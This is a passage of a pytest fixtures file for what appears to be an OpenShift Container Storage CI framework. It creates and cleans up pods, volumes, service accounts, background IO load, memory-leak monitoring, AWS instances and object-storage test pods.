@pytest.fixture(scope="class")
def pod_factory_class(request, pvc_factory_class):
return pod_factory_fixture(request, pvc_factory_class)
@pytest.fixture(scope="session")
def pod_factory_session(request, pvc_factory_session):
return pod_factory_fixture(request, pvc_factory_session)
@pytest.fixture(scope="function")
def pod_factory(request, pvc_factory):
return pod_factory_fixture(request, pvc_factory)
def pod_factory_fixture(request, pvc_factory):
"""
Create a Pod factory. Calling this fixture creates new Pod.
For custom Pods provide 'pvc' parameter.
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
custom_data=None,
status=constants.STATUS_RUNNING,
node_name=None,
pod_dict_path=None,
raw_block_pv=False,
deployment_config=False,
service_account=None,
replica_count=1,
command=None,
command_args=None,
subpath=None,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod.
raw_block_pv (bool): True for creating raw block pv based pod,
False otherwise.
deployment_config (bool): True for DeploymentConfig creation,
False otherwise
service_account (OCS): Service account object, in case DeploymentConfig
is to be created
replica_count (int): The replica count for deployment config
command (list): The command to be executed on the pod
command_args (list): The arguments to be sent to the command running
on the pod
subpath (str): Value of subPath parameter in pod yaml
Returns:
object: helpers.create_pod instance
"""
sa_name = service_account.name if service_account else None
if custom_data:
pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface)
pod_obj = helpers.create_pod(
pvc_name=pvc.name,
namespace=pvc.namespace,
interface_type=interface,
node_name=node_name,
pod_dict_path=pod_dict_path,
raw_block_pv=raw_block_pv,
dc_deployment=deployment_config,
sa_name=sa_name,
replica_count=replica_count,
command=command,
command_args=command_args,
subpath=subpath,
)
assert pod_obj, "Failed to create pod"
if deployment_config:
dc_name = pod_obj.get_labels().get("name")
dc_ocp_dict = ocp.OCP(
kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace
).get(resource_name=dc_name)
dc_obj = OCS(**dc_ocp_dict)
instances.append(dc_obj)
else:
instances.append(pod_obj)
if status:
helpers.wait_for_resource_state(pod_obj, status, timeout=300)
pod_obj.reload()
pod_obj.pvc = pvc
if deployment_config:
return dc_obj
return pod_obj
def finalizer():
"""
Delete the Pod or the DeploymentConfig
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def teardown_factory_class(request):
return teardown_factory_fixture(request)
@pytest.fixture(scope="session")
def teardown_factory_session(request):
return teardown_factory_fixture(request)
@pytest.fixture(scope="function")
def teardown_factory(request):
return teardown_factory_fixture(request)
def teardown_factory_fixture(request):
"""
Tearing down a resource that was created during the test
To use this factory, you'll need to pass 'teardown_factory' to your test
function and call it in your test when a new resource was created and you
want it to be removed in teardown phase:
def test_example(self, teardown_factory):
pvc_obj = create_pvc()
teardown_factory(pvc_obj)
"""
instances = []
def factory(resource_obj):
"""
Args:
resource_obj (OCS object or list of OCS objects) : Object to teardown after the test
"""
if isinstance(resource_obj, list):
instances.extend(resource_obj)
else:
instances.append(resource_obj)
def finalizer():
"""
Delete the resources created in the test
"""
for instance in instances[::-1]:
if not instance.is_deleted:
try:
if (instance.kind == constants.PVC) and (instance.reclaim_policy):
pass
reclaim_policy = (
instance.reclaim_policy
if instance.kind == constants.PVC
else None
)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
if reclaim_policy == constants.RECLAIM_POLICY_DELETE:
helpers.validate_pv_delete(instance.backed_pv)
except CommandFailed as ex:
log.warning(
f"Resource is already in deleted state, skipping this step"
f"Error: {ex}"
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def service_account_factory_class(request):
return service_account_factory_fixture(request)
@pytest.fixture(scope="session")
def service_account_factory_session(request):
return service_account_factory_fixture(request)
@pytest.fixture(scope="function")
def service_account_factory(request):
return service_account_factory_fixture(request)
def service_account_factory_fixture(request):
"""
Create a service account
"""
instances = []
active_service_account_obj = None
def factory(project=None, service_account=None):
"""
Args:
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
service_account (str): service_account_name
Returns:
object: serviceaccount instance.
"""
nonlocal active_service_account_obj
if active_service_account_obj and not service_account:
return active_service_account_obj
elif service_account:
sa_obj = helpers.get_serviceaccount_obj(
sa_name=service_account, namespace=project.namespace
)
if not helpers.validate_scc_policy(
sa_name=service_account, namespace=project.namespace
):
helpers.add_scc_policy(
sa_name=service_account, namespace=project.namespace
)
sa_obj.project = project
active_service_account_obj = sa_obj
instances.append(sa_obj)
return sa_obj
else:
sa_obj = helpers.create_serviceaccount(
namespace=project.namespace,
)
sa_obj.project = project
active_service_account_obj = sa_obj
helpers.add_scc_policy(sa_name=sa_obj.name, namespace=project.namespace)
assert sa_obj, "Failed to create serviceaccount"
instances.append(sa_obj)
return sa_obj
def finalizer():
"""
Delete the service account
"""
for instance in instances:
helpers.remove_scc_policy(
sa_name=instance.name, namespace=instance.namespace
)
instance.delete()
instance.ocp.wait_for_delete(resource_name=instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def dc_pod_factory(request, pvc_factory, service_account_factory):
"""
Create deploymentconfig pods
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
service_account=None,
size=None,
custom_data=None,
node_name=None,
node_selector=None,
replica_count=1,
raw_block_pv=False,
sa_obj=None,
wait=True,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
service_account (str): service account name for dc_pods
size (int): The requested size for the PVC
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
node_name (str): The name of specific node to schedule the pod
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
replica_count (int): Replica count for deployment config
raw_block_pv (str): True if pod with raw block pvc
sa_obj (object) : If specific service account is needed
"""
if custom_data:
dc_pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface, size=size)
sa_obj = sa_obj or service_account_factory(
project=pvc.project, service_account=service_account
)
dc_pod_obj = helpers.create_pod(
interface_type=interface,
pvc_name=pvc.name,
do_reload=False,
namespace=pvc.namespace,
sa_name=sa_obj.name,
dc_deployment=True,
replica_count=replica_count,
node_name=node_name,
node_selector=node_selector,
raw_block_pv=raw_block_pv,
pod_dict_path=constants.FEDORA_DC_YAML,
)
instances.append(dc_pod_obj)
log.info(dc_pod_obj.name)
if wait:
helpers.wait_for_resource_state(
dc_pod_obj, constants.STATUS_RUNNING, timeout=180
)
dc_pod_obj.pvc = pvc
return dc_pod_obj
def finalizer():
"""
Delete dc pods
"""
for instance in instances:
delete_deploymentconfig_pods(instance)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="session", autouse=True)
def polarion_testsuite_properties(record_testsuite_property, pytestconfig):
"""
Configures polarion testsuite properties for junit xml
"""
polarion_project_id = config.REPORTING["polarion"]["project_id"]
record_testsuite_property("polarion-project-id", polarion_project_id)
jenkins_build_url = config.RUN.get("jenkins_build_url")
if jenkins_build_url:
record_testsuite_property("polarion-custom-description", jenkins_build_url)
polarion_testrun_name = get_testrun_name()
record_testsuite_property("polarion-testrun-id", polarion_testrun_name)
record_testsuite_property("polarion-testrun-status-id", "inprogress")
record_testsuite_property("polarion-custom-isautomated", "True")
@pytest.fixture(scope="session", autouse=True)
def additional_testsuite_properties(record_testsuite_property, pytestconfig):
"""
Configures additional custom testsuite properties for junit xml
"""
# add logs url
logs_url = config.RUN.get("logs_url")
if logs_url:
record_testsuite_property("logs-url", logs_url)
# add run_id
record_testsuite_property("run_id", config.RUN["run_id"])
# Report Portal
launch_name = reporting.get_rp_launch_name()
record_testsuite_property("rp_launch_name", launch_name)
launch_description = reporting.get_rp_launch_description()
record_testsuite_property("rp_launch_description", launch_description)
attributes = reporting.get_rp_launch_attributes()
for key, value in attributes.items():
# Prefix with `rp_` so the rp_preproc upload script knows to use the property
record_testsuite_property(f"rp_{key}", value)
launch_url = config.REPORTING.get("rp_launch_url")
if launch_url:
record_testsuite_property("rp_launch_url", launch_url)
@pytest.fixture(scope="session")
def tier_marks_name():
"""
Gets the tier mark names
Returns:
list: list of tier mark names
"""
tier_marks_name = []
for each_tier in tier_marks:
try:
tier_marks_name.append(each_tier.name)
except AttributeError:
tier_marks_name.append(each_tier().args[0].name)
return tier_marks_name
@pytest.fixture(scope="function", autouse=True)
def health_checker(request, tier_marks_name):
skipped = False
dev_mode = config.RUN["cli_params"].get("dev_mode")
if dev_mode:
log.info("Skipping health checks for development mode")
return
def finalizer():
if not skipped:
try:
teardown = config.RUN["cli_params"]["teardown"]
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
mcg_only_deployment = config.ENV_DATA["mcg_only_deployment"]
if not (teardown or skip_ocs_deployment or mcg_only_deployment):
ceph_health_check_base()
log.info("Ceph health check passed at teardown")
except CephHealthException:
log.info("Ceph health check failed at teardown")
# Retrying to increase the chance the cluster health will be OK
# for next test
ceph_health_check()
raise
node = request.node
request.addfinalizer(finalizer)
for mark in node.iter_markers():
if mark.name in tier_marks_name:
log.info("Checking for Ceph Health OK ")
try:
status = ceph_health_check_base()
if status:
log.info("Ceph health check passed at setup")
return
except CephHealthException:
skipped = True
# skip because ceph is not in good health
pytest.skip("Ceph health check failed at setup")
@pytest.fixture(scope="session", autouse=True)
def cluster(request, log_cli_level, record_testsuite_property):
"""
This fixture initiates deployment for both OCP and OCS clusters.
Specific platform deployment classes will handle the fine details
of action
"""
log.info(f"All logs located at {ocsci_log_path()}")
teardown = config.RUN["cli_params"]["teardown"]
deploy = config.RUN["cli_params"]["deploy"]
if teardown or deploy:
factory = dep_factory.DeploymentFactory()
deployer = factory.get_deployment()
# Add a finalizer to teardown the cluster after test execution is finished
if teardown:
def cluster_teardown_finalizer():
# If KMS is configured, clean up the backend resources
# we are doing it before OCP cleanup
if config.DEPLOYMENT.get("kms_deployment"):
kms = KMS.get_kms_deployment()
kms.cleanup()
deployer.destroy_cluster(log_cli_level)
request.addfinalizer(cluster_teardown_finalizer)
log.info("Will teardown cluster because --teardown was provided")
# Download client
if config.DEPLOYMENT["skip_download_client"]:
log.info("Skipping client download")
else:
force_download = (
config.RUN["cli_params"].get("deploy")
and config.DEPLOYMENT["force_download_client"]
)
get_openshift_client(force_download=force_download)
# set environment variable for early testing of RHCOS
if config.ENV_DATA.get("early_testing"):
release_img = config.ENV_DATA["RELEASE_IMG"]
log.info(f"Running early testing of RHCOS with release image: {release_img}")
os.environ["RELEASE_IMG"] = release_img
os.environ["OPENSHIFT_INSTALL_RELEASE_IMAGE_OVERRIDE"] = release_img
if deploy:
# Deploy cluster
deployer.deploy_cluster(log_cli_level)
else:
if config.ENV_DATA["platform"] == constants.IBMCLOUD_PLATFORM:
ibmcloud.login()
record_testsuite_property("rp_ocs_build", get_ocs_build_number())
@pytest.fixture(scope="class")
def environment_checker(request):
node = request.node
# List of marks for which we will ignore the leftover checker
marks_to_ignore = [m.mark for m in [deployment, ignore_leftovers]]
# app labels of resources to be excluded for leftover check
exclude_labels = [constants.must_gather_pod_label]
for mark in node.iter_markers():
if mark in marks_to_ignore:
return
if mark.name == ignore_leftover_label.name:
exclude_labels.extend(list(mark.args))
request.addfinalizer(
partial(get_status_after_execution, exclude_labels=exclude_labels)
)
get_status_before_execution(exclude_labels=exclude_labels)
@pytest.fixture(scope="session")
def log_cli_level(pytestconfig):
"""
Retrieves the log_cli_level set in pytest.ini
Returns:
str: log_cli_level set in pytest.ini or DEBUG if not set
"""
return pytestconfig.getini("log_cli_level") or "DEBUG"
@pytest.fixture(scope="session", autouse=True)
def cluster_load(
request,
project_factory_session,
pvc_factory_session,
service_account_factory_session,
pod_factory_session,
):
"""
Run IO during the test execution
"""
cl_load_obj = None
io_in_bg = config.RUN.get("io_in_bg")
log_utilization = config.RUN.get("log_utilization")
io_load = config.RUN.get("io_load")
cluster_load_error = None
cluster_load_error_msg = (
"Cluster load might not work correctly during this run, because "
"it failed with an exception: %s"
)
# IO load should not happen during deployment
deployment_test = (
True if ("deployment" in request.node.items[0].location[0]) else False
)
if io_in_bg and not deployment_test:
io_load = int(io_load) * 0.01
log.info(wrap_msg("Tests will be running while IO is in the background"))
log.info(
"Start running IO in the background. The amount of IO that "
"will be written is going to be determined by the cluster "
"capabilities according to its limit"
)
try:
cl_load_obj = ClusterLoad(
project_factory=project_factory_session,
sa_factory=service_account_factory_session,
pvc_factory=pvc_factory_session,
pod_factory=pod_factory_session,
target_percentage=io_load,
)
cl_load_obj.reach_cluster_load_percentage()
except Exception as ex:
log.error(cluster_load_error_msg, ex)
cluster_load_error = ex
if (log_utilization or io_in_bg) and not deployment_test:
if not cl_load_obj:
try:
cl_load_obj = ClusterLoad()
except Exception as ex:
log.error(cluster_load_error_msg, ex)
cluster_load_error = ex
config.RUN["load_status"] = "running"
def finalizer():
"""
Stop the thread that executed watch_load()
"""
config.RUN["load_status"] = "finished"
if thread:
thread.join()
if cluster_load_error:
raise cluster_load_error
request.addfinalizer(finalizer)
def watch_load():
"""
Watch the cluster load by monitoring the cluster latency.
Print the cluster utilization metrics every 15 seconds.
If IOs are running in the test background, dynamically adjust
the IO load based on the cluster latency.
"""
while config.RUN["load_status"] != "finished":
time.sleep(20)
try:
cl_load_obj.print_metrics(mute_logs=True)
if io_in_bg:
if config.RUN["load_status"] == "running":
cl_load_obj.adjust_load_if_needed()
elif config.RUN["load_status"] == "to_be_paused":
cl_load_obj.reduce_load(pause=True)
config.RUN["load_status"] = "paused"
elif config.RUN["load_status"] == "to_be_reduced":
cl_load_obj.reduce_load(pause=False)
config.RUN["load_status"] = "reduced"
elif config.RUN["load_status"] == "to_be_resumed":
cl_load_obj.resume_load()
config.RUN["load_status"] = "running"
# Any type of exception should be caught and we should continue.
# We don't want any test to fail
except Exception:
continue
thread = threading.Thread(target=watch_load)
thread.start()
def resume_cluster_load_implementation():
"""
Resume cluster load implementation
"""
config.RUN["load_status"] = "to_be_resumed"
try:
for load_status in TimeoutSampler(300, 3, config.RUN.get, "load_status"):
if load_status == "running":
break
except TimeoutExpiredError:
log.error("Cluster load was not resumed successfully")
def reduce_cluster_load_implementation(request, pause, resume=True):
"""
Pause/reduce the background cluster load
Args:
pause (bool): True for completely pausing the cluster load, False for reducing it by 50%
resume (bool): True for resuming the cluster load upon teardown, False for not resuming
"""
if config.RUN.get("io_in_bg"):
def finalizer():
"""
Resume the cluster load
"""
if resume:
resume_cluster_load_implementation()
request.addfinalizer(finalizer)
config.RUN["load_status"] = "to_be_paused" if pause else "to_be_reduced"
try:
for load_status in TimeoutSampler(300, 3, config.RUN.get, "load_status"):
if load_status in ["paused", "reduced"]:
break
except TimeoutExpiredError:
log.error(
f"Cluster load was not {'paused' if pause else 'reduced'} successfully"
)
@pytest.fixture()
def pause_cluster_load(request):
"""
Pause the background cluster load without resuming it
"""
reduce_cluster_load_implementation(request=request, pause=True, resume=False)
@pytest.fixture()
def resume_cluster_load(request):
"""
Resume the background cluster load
"""
if config.RUN.get("io_in_bg"):
def finalizer():
"""
Resume the cluster load
"""
resume_cluster_load_implementation()
request.addfinalizer(finalizer)
@pytest.fixture()
def pause_and_resume_cluster_load(request):
"""
Pause the background cluster load and resume it in teardown to the original load value
"""
reduce_cluster_load_implementation(request=request, pause=True)
@pytest.fixture()
def reduce_and_resume_cluster_load(request):
"""
Reduce the background cluster load to be 50% of what it is and resume the load in teardown
to the original load value
"""
reduce_cluster_load_implementation(request=request, pause=False)
@pytest.fixture(
params=[
pytest.param({"interface": constants.CEPHBLOCKPOOL}),
pytest.param({"interface": constants.CEPHFILESYSTEM}),
],
ids=["RBD", "CephFS"],
)
def interface_iterate(request):
"""
Iterate over interfaces - CephBlockPool and CephFileSystem
"""
return request.param["interface"]
@pytest.fixture(scope="class")
def multi_pvc_factory_class(project_factory_class, pvc_factory_class):
return multi_pvc_factory_fixture(project_factory_class, pvc_factory_class)
@pytest.fixture(scope="session")
def multi_pvc_factory_session(project_factory_session, pvc_factory_session):
return multi_pvc_factory_fixture(project_factory_session, pvc_factory_session)
@pytest.fixture(scope="function")
def multi_pvc_factory(project_factory, pvc_factory):
return multi_pvc_factory_fixture(project_factory, pvc_factory)
def multi_pvc_factory_fixture(project_factory, pvc_factory):
"""
Create a Persistent Volume Claims factory. Calling this fixture creates a
set of new PVCs. Options for PVC creation based on provided assess modes:
1. For each PVC, choose random value from the list of access modes
2. Create PVCs based on the specified distribution number of access modes.
Create sets of PVCs based on the order of access modes.
3. Create PVCs based on the specified distribution number of access modes.
The order of PVC creation is independent of access mode.
"""
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_modes=None,
access_modes_selection="distribute_sequential",
access_mode_dist_ratio=None,
status=constants.STATUS_BOUND,
num_of_pvc=1,
wait_each=False,
timeout=60,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_modes (list): List of access modes. One of the access modes
will be chosen for creating each PVC. If not specified,
ReadWriteOnce will be selected for all PVCs. To specify
volume mode, append volume mode in the access mode name
separated by '-'.
eg: ['ReadWriteOnce', 'ReadOnlyMany', 'ReadWriteMany',
'ReadWriteMany-Block']
access_modes_selection (str): Decides how to select accessMode for
each PVC from the options given in 'access_modes' list.
Values are 'select_random', 'distribute_random'
'select_random' : While creating each PVC, one access mode will
be selected from the 'access_modes' list.
'distribute_random' : The access modes in the list
'access_modes' will be distributed based on the values in
'distribute_ratio' and the order in which PVCs are created
will not be based on the access modes. For example, 1st and
6th PVC might have same access mode.
'distribute_sequential' :The access modes in the list
'access_modes' will be distributed based on the values in
'distribute_ratio' and the order in which PVCs are created
will be as sets of PVCs of same assess mode. For example,
first set of 10 will be having same access mode followed by
next set of 13 with a different access mode.
access_mode_dist_ratio (list): Contains the number of PVCs to be
created for each access mode. If not specified, the given list
of access modes will be equally distributed among the PVCs.
eg: [10,12] for num_of_pvc=22 and
access_modes=['ReadWriteOnce', 'ReadWriteMany']
status (str): If provided then factory waits for object to reach
desired state.
num_of_pvc(int): Number of PVCs to be created
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
timeout(int): Time in seconds to wait
Returns:
list: objects of PVC class.
"""
pvc_list = []
if wait_each:
status_tmp = status
else:
status_tmp = ""
project = project or project_factory()
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
access_modes = access_modes or [constants.ACCESS_MODE_RWO]
access_modes_list = []
if access_modes_selection == "select_random":
for _ in range(num_of_pvc):
mode = random.choice(access_modes)
access_modes_list.append(mode)
else:
if not access_mode_dist_ratio:
num_of_modes = len(access_modes)
dist_val = floor(num_of_pvc / num_of_modes)
access_mode_dist_ratio = [dist_val] * num_of_modes
access_mode_dist_ratio[-1] = dist_val + (num_of_pvc % num_of_modes)
zipped_share = list(zip(access_modes, access_mode_dist_ratio))
for mode, share in zipped_share:
access_modes_list.extend([mode] * share)
if access_modes_selection == "distribute_random":
random.shuffle(access_modes_list)
for access_mode in access_modes_list:
if "-" in access_mode:
access_mode, volume_mode = access_mode.split("-")
else:
volume_mode = ""
pvc_obj = pvc_factory(
interface=interface,
project=project,
storageclass=storageclass,
size=size,
access_mode=access_mode,
status=status_tmp,
volume_mode=volume_mode,
)
pvc_list.append(pvc_obj)
pvc_obj.project = project
if status and not wait_each:
for pvc_obj in pvc_list:
helpers.wait_for_resource_state(pvc_obj, status, timeout=timeout)
return pvc_list
return factory
@pytest.fixture(scope="function")
def memory_leak_function(request):
"""
Function to start Memory leak thread which will be executed parallel with test run
Memory leak data will be captured in all worker nodes for ceph-osd process
Data will be appended in /tmp/(worker)-top-output.txt file for each worker
During teardown created tmp files will be deleted
Usage:
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
def finalizer():
"""
Finalizer to stop memory leak data capture thread and cleanup the files
"""
set_flag_status("terminated")
try:
for status in TimeoutSampler(90, 3, get_flag_status):
if status == "terminated":
break
except TimeoutExpiredError:
log.warning(
"Background test execution still in progress before"
"memory leak thread terminated"
)
if thread:
thread.join()
log_path = ocsci_log_path()
for worker in node.get_worker_nodes():
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
copyfile(
f"/tmp/{worker}-top-output.txt",
f"{log_path}/{worker}-top-output.txt",
)
os.remove(f"/tmp/{worker}-top-output.txt")
log.info("Memory leak capture has stopped")
request.addfinalizer(finalizer)
temp_file = tempfile.NamedTemporaryFile(
mode="w+", prefix="test_status", delete=False
)
def get_flag_status():
with open(temp_file.name, "r") as t_file:
return t_file.readline()
def set_flag_status(value):
with open(temp_file.name, "w") as t_file:
t_file.writelines(value)
set_flag_status("running")
def run_memory_leak_in_bg():
"""
Function to run memory leak in background thread
Memory leak data is written in below format
date time PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
"""
oc = ocp.OCP(namespace=config.ENV_DATA["cluster_namespace"])
while get_flag_status() == "running":
for worker in node.get_worker_nodes():
filename = f"/tmp/{worker}-top-output.txt"
top_cmd = f"debug nodes/{worker} -- chroot /host top -n 2 b"
with open("/tmp/file.txt", "w+") as temp:
temp.write(
str(oc.exec_oc_cmd(command=top_cmd, out_yaml_format=False))
)
temp.seek(0)
for line in temp:
if line.__contains__("ceph-osd"):
with open(filename, "a+") as f:
f.write(str(datetime.now()))
f.write(" ")
f.write(line)
log.info("Start memory leak data capture in the test background")
thread = threading.Thread(target=run_memory_leak_in_bg)
thread.start()
@pytest.fixture()
def aws_obj():
"""
Initialize AWS instance
Returns:
AWS: An instance of AWS class
"""
aws_obj = aws.AWS()
return aws_obj
@pytest.fixture()
def ec2_instances(request, aws_obj):
"""
Get cluster instances
Returns:
dict: The ID keys and the name values of the instances
"""
# Get all cluster nodes objects
nodes = node.get_node_objs()
# Get the cluster nodes ec2 instances
ec2_instances = aws.get_instances_ids_and_names(nodes)
assert (
ec2_instances
), f"Failed to get ec2 instances for node {[n.name for n in nodes]}"
def finalizer():
"""
Make sure all instances are running
"""
# Getting the instances that are in status 'stopping' (if there are any), to wait for them to
# get to status 'stopped' so it will be possible to start them
stopping_instances = {
key: val
for key, val in ec2_instances.items()
if (aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPING)
}
# Waiting fot the instances that are in status 'stopping'
# (if there are any) to reach 'stopped'
if stopping_instances:
for stopping_instance in stopping_instances:
instance = aws_obj.get_ec2_instance(stopping_instance.key())
instance.wait_until_stopped()
stopped_instances = {
key: val
for key, val in ec2_instances.items()
if (aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPED)
}
# Start the instances
if stopped_instances:
aws_obj.start_ec2_instances(instances=stopped_instances, wait=True)
request.addfinalizer(finalizer)
return ec2_instances
@pytest.fixture(scope="session")
def cld_mgr(request, rgw_endpoint):
"""
Returns a cloud manager instance that'll be used throughout the session
Returns:
CloudManager: A CloudManager resource
"""
cld_mgr = CloudManager()
def finalizer():
for client in vars(cld_mgr):
try:
getattr(cld_mgr, client).secret.delete()
except AttributeError:
log.info(f"{client} secret not found")
request.addfinalizer(finalizer)
return cld_mgr
@pytest.fixture()
def rgw_obj(request):
return rgw_obj_fixture(request)
@pytest.fixture(scope="session")
def rgw_obj_session(request):
return rgw_obj_fixture(request)
def rgw_obj_fixture(request):
"""
Returns an RGW resource that represents RGW in the cluster
Returns:
RGW: An RGW resource
"""
rgw_deployments = get_deployments_having_label(
label=constants.RGW_APP_LABEL, namespace=config.ENV_DATA["cluster_namespace"]
)
try:
storageclass = OCP(
kind=constants.STORAGECLASS,
namespace=config.ENV_DATA["cluster_namespace"],
resource_name=constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RGW,
).get()
except CommandFailed:
storageclass = None
if rgw_deployments or storageclass:
return RGW()
else:
return None
@pytest.fixture()
def rgw_deployments(request):
"""
Return RGW deployments or skip the test.
"""
rgw_deployments = get_deployments_having_label(
label=constants.RGW_APP_LABEL, namespace=config.ENV_DATA["cluster_namespace"]
)
if rgw_deployments:
# Force-skipping in case of IBM Cloud -
# https://github.com/red-hat-storage/ocs-ci/issues/3863
if config.ENV_DATA["platform"].lower() == constants.IBMCLOUD_PLATFORM:
pytest.skip(
"RGW deployments were found, but test will be skipped because of BZ1926831"
)
return rgw_deployments
else:
pytest.skip("There is no RGW deployment available for this test.")
@pytest.fixture(scope="session")
def rgw_endpoint(request):
"""
Expose RGW service and return external RGW endpoint address if available.
Returns:
string: external RGW endpoint
"""
log.info("Looking for RGW service to expose")
oc = ocp.OCP(kind=constants.SERVICE, namespace=config.ENV_DATA["cluster_namespace"])
rgw_service = oc.get(selector=constants.RGW_APP_LABEL)["items"]
if rgw_service:
if config.DEPLOYMENT["external_mode"]:
rgw_service = constants.RGW_SERVICE_EXTERNAL_MODE
else:
rgw_service = constants.RGW_SERVICE_INTERNAL_MODE
log.info(f"Service {rgw_service} found and will be exposed")
# custom hostname is provided because default hostname from rgw service
# is too long and OCP rejects it
oc = ocp.OCP(
kind=constants.ROUTE, namespace=config.ENV_DATA["cluster_namespace"]
)
route = oc.get(resource_name="noobaa-mgmt")
router_hostname = route["status"]["ingress"][0]["routerCanonicalHostname"]
rgw_hostname = f"rgw.{router_hostname}"
try:
oc.exec_oc_cmd(f"expose service/{rgw_service} --hostname {rgw_hostname}")
except CommandFailed as cmdfailed:
if "AlreadyExists" in str(cmdfailed):
log.warning("RGW route already exists.")
# new route is named after service
rgw_endpoint = oc.get(resource_name=rgw_service)
endpoint_obj = OCS(**rgw_endpoint)
def _finalizer():
endpoint_obj.delete()
request.addfinalizer(_finalizer)
return f"http://{rgw_hostname}"
else:
log.info("RGW service is not available")
@pytest.fixture()
def mcg_obj(request):
return mcg_obj_fixture(request)
@pytest.fixture(scope="session")
def mcg_obj_session(request):
return mcg_obj_fixture(request)
def mcg_obj_fixture(request, *args, **kwargs):
"""
Returns an MCG resource that's connected to the S3 endpoint
Returns:
MCG: An MCG resource
"""
if config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM:
log.warning("As openshift dedicated is used, no MCG resource is returned")
return None
mcg_obj = MCG(*args, **kwargs)
def finalizer():
if config.ENV_DATA["platform"].lower() == "aws":
mcg_obj.cred_req_obj.delete()
if kwargs.get("create_aws_creds"):
request.addfinalizer(finalizer)
return mcg_obj
@pytest.fixture()
def awscli_pod(request):
return awscli_pod_fixture(request, scope_name="function")
@pytest.fixture(scope="session")
def awscli_pod_session(request):
return awscli_pod_fixture(request, scope_name="session")
def awscli_pod_fixture(request, scope_name):
"""
Creates a new AWSCLI pod for relaying commands
Args:
scope_name (str): The name of the fixture's scope,
used for giving a descriptive name to the pod and configmap
Returns:
pod: A pod running the AWS CLI
"""
# Create the service-ca configmap to be mounted upon pod creation
service_ca_data = templating.load_yaml(constants.AWSCLI_SERVICE_CA_YAML)
service_ca_configmap_name = create_unique_resource_name(
constants.AWSCLI_SERVICE_CA_CONFIGMAP_NAME, scope_name
)
service_ca_data["metadata"]["name"] = service_ca_configmap_name
log.info("Trying to create the AWS CLI service CA")
service_ca_configmap = helpers.create_resource(**service_ca_data)
arch = get_system_architecture()
if arch.startswith("x86"):
pod_dict_path = constants.AWSCLI_POD_YAML
else:
pod_dict_path = constants.AWSCLI_MULTIARCH_POD_YAML
awscli_pod_dict = templating.load_yaml(pod_dict_path)
awscli_pod_dict["spec"]["volumes"][0]["configMap"][
"name"
] = service_ca_configmap_name
awscli_pod_name = create_unique_resource_name(
constants.AWSCLI_RELAY_POD_NAME, scope_name
)
awscli_pod_dict["metadata"]["name"] = awscli_pod_name
update_container_with_mirrored_image(awscli_pod_dict)
awscli_pod_obj = Pod(**awscli_pod_dict)
assert awscli_pod_obj.create(
do_reload=True
), f"Failed to create Pod {awscli_pod_name}"
OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE, kind="ConfigMap").wait_for_resource(
resource_name=service_ca_configmap.name, column="DATA", condition="1"
)
helpers.wait_for_resource_state(awscli_pod_obj, constants.STATUS_RUNNING)
def _awscli_pod_cleanup():
awscli_pod_obj.delete()
service_ca_configmap.delete()
request.addfinalizer(_awscli_pod_cleanup)
return awscli_pod_obj
@pytest.fixture()
def test_directory_setup(request, awscli_pod_session):
return test_directory_setup_fixture(request, awscli_pod_session)
def test_directory_setup_fixture(request, awscli_pod_session):
origin_dir, result_dir = setup_pod_directories(
awscli_pod_session, ["origin", "result"]
)
SetupDirs = namedtuple("SetupDirs", "origin_dir, result_dir")
def dir_cleanup():
test_name = get_current_test_name()
awscli_pod_session.exec_cmd_on_pod(command=f"rm -rf {test_name}")
request.addfinalizer(dir_cleanup)
return SetupDirs(origin_dir=origin_dir, result_dir=result_dir)
@pytest.fixture()
def nodes():
"""
Return an instance of the relevant platform nodes class
(e.g. AWSNodes, VMWareNodes) to be later used in the test
for nodes related operations, like nodes restart,
detach/attach volume, etc.
"""
factory = platform_nodes.PlatformNodesFactory()
nodes = factory.get_nodes_platform()
return nodes
@pytest.fixture()
def uploaded_objects(request, mcg_obj, awscli_pod, verify_rgw_restart_count):
